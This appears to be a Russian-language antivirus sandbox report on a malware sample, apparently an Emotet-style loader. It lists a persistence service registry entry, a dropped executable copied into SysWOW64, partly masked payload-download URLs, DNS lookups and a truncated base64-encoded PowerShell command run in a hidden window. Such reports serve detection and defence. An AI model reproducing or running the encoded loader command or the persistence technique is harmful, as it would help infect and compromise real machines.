Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\hlfserver] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\hlfserver] 'ImagePath' = '"%WINDIR%\SysWOW64\hlfserver.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAAWgBnAHcAYQB5AG4AawB5ACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAFYAbwBlAGEAcwBwAHcAdgAgACMAPgAgACQASwBhAGcAaQBpAG0AeAB4AHAAcgA9ACcATgB4AGEAegBqAHAAZA...
- %HOMEPATH%\504.exe
- %HOMEPATH%\504.exe
- %HOMEPATH%\504.exe в %WINDIR%\syswow64\hlfserver.exe
- %HOMEPATH%\504.exe
- http://co#####.greenvines.com.tw/wp-content/i2122/
- http://gt##ar.ir/wp-content/1q6q09283/
- http://19#.#17.1.149/json/cab/
- http://45.##.79.249:443/entries/window/ via 45.##.79.249
- DNS ASK te##ecn.com
- DNS ASK co#####.greenvines.com.tw
- DNS ASK re####.mktrike.cz
- DNS ASK gt##ar.ir
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAAWgBnAHcAYQB5AG4AawB5ACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAFYAbwBlAGEAcwBwAHcAdgAgACMAPgAgACQASwBhAGcAaQBpAG0AeAB4AHAAcgA9ACcATgB4AGEAegBqAHAAZA...' (со скрытым окном)